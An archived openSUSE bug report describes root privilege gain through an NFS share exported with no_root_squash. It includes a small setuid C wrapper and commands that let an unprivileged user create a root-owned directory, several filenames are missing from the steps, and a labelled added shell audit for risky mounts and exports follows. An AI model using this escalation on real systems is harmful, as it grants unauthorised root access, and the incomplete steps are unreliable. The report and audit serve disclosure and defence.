Mailinglist Archive: opensuse-bugs (4671 mails)

[Bug 640601] New: Priv Gain thru NFS - suspect mount nosetuid being bypassed
  • From: bugzilla_noreply@xxxxxxxxxx
  • Date: Mon, 20 Sep 2010 18:07:43 +0000
  • Message-id: <bug-640601-21960@xxxxxxxxxxxxxxxxxxxxxxxx/>

Summary: Priv Gain thru NFS - suspect mount nosetuid being bypassed
Classification: openSUSE
Product: openSUSE 11.2
Version: Final
Platform: x86-64
OS/Version: openSUSE 11.2
Status: NEW
Severity: Critical
Priority: P5 - None
Component: Security
AssignedTo: security-team@xxxxxxx
ReportedBy: p.chiu@xxxxxxxx
QAContact: qa@xxxxxxx
Found By: ---
Blocker: ---

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; (R1
1.6); SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR
3.0.30618; AskTbBLT/

We allow a software engineer user with sudo (all) access on one openSUSE 11.2
server called ServerA.

We also mount storage from ServerB (another openSUSE 11.2 system) using NFS
to allow full access for some applications (i.e. with no_root_squash enabled).

mount serverB:/serverB /serverB
mount -o remount,nosetuid serverB:/serverB /serverB
mount | grep serverB
serverB:/serverB on /serverB type nfs

The user then logs on serverA.

sudo mkdir /serverB/test
cd /serverB/test
sudo vi script1.c to contain
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
    setuid( 0 );
    system( "./" );

    return 0;
}

sudo cc -o script1.o script1.c
sudo chmod 4755 script1.o
sudo vi to contain
mkdir /abcd

sudo chmod 755
ls -ls
pcmc@aspre:/mnt/holly1/test> ls -ls
total 20
4 -rw-r--r-- 1 root root 158 2010-09-20 18:25 script1.c
12 -rwsr-xr-x 1 root root 11942 2010-09-20 18:27 script1.o
4 -rwxr-xr-x 1 root root 12 2010-09-20 18:26

Now, any unprivileged user on serverB will be able to obtain root privileges
by invoking the program script1.o.

For instance, logged on serverB,
su - lp
ls -lsd /abcd will show
ls: cannot access /abcd: No such file or directory
cd /serverB/test
ls -lsd /abcd
4 drwxr-xr-x 2 root lp 4096 2010-09-20 18:31 /abcd

Imagine what you can put inside!!!

It appears that the mount nosetuid option is ignored.

Reproducible: Always

Steps to Reproduce:
1. as stated above
Actual Results:
as described above
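
An added example, not part of the original report: a defender-side audit of the two settings the report turns on, written as shell functions whose names are hypothetical. It flags NFS mounts that lack nosuid (the Linux mount(8) spelling of the option the report calls nosetuid) and exports that carry no_root_squash; the sample mount and export lines are constructed, and on a live host the inputs would be /proc/mounts and /etc/exports.

```shell
#!/bin/sh
# Added example: audit helpers, not code from the bug report.

# Print mount points of NFS filesystems mounted WITHOUT nosuid.
# Input (stdin): /proc/mounts format: device mountpoint fstype options dump pass
nfs_without_nosuid() {
    awk '$3 ~ /^nfs4?$/ {
        n = split($4, opt, ","); found = 0
        for (i = 1; i <= n; i++) if (opt[i] == "nosuid") found = 1
        if (!found) print $2
    }'
}

# Print exported paths that grant no_root_squash to at least one client.
# Input (stdin): /etc/exports format: path client(opts) [client(opts) ...]
exports_no_root_squash() {
    awk '!/^[ \t]*#/ && NF >= 2 {
        for (i = 2; i <= NF; i++)
            if ($i ~ /[(,]no_root_squash[,)]/) { print $1; break }
    }'
}

# List setuid/setgid regular files under a directory, staying on one filesystem.
find_setid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print
}

# Constructed sample data (not taken from the report).
SAMPLE_MOUNTS='serverB:/serverB /serverB nfs rw,relatime,vers=3,addr=192.0.2.10 0 0
serverC:/data /data nfs4 rw,nosuid,nodev,relatime 0 0
/dev/sda2 / ext4 rw,relatime 0 0'

SAMPLE_EXPORTS='# constructed sample
/serverB serverA(rw,sync,no_root_squash)
/pub *(ro,sync,root_squash)'

printf '%s\n' "$SAMPLE_MOUNTS" | nfs_without_nosuid |
    sed 's/^/NFS mount without nosuid: /'
printf '%s\n' "$SAMPLE_EXPORTS" | exports_no_root_squash |
    sed 's/^/export with no_root_squash: /'
```

Mount options take effect only on the host that made the mount, so the mount check belongs on every host that can execute files from the exported directory, and find_setid_files on the server that owns it.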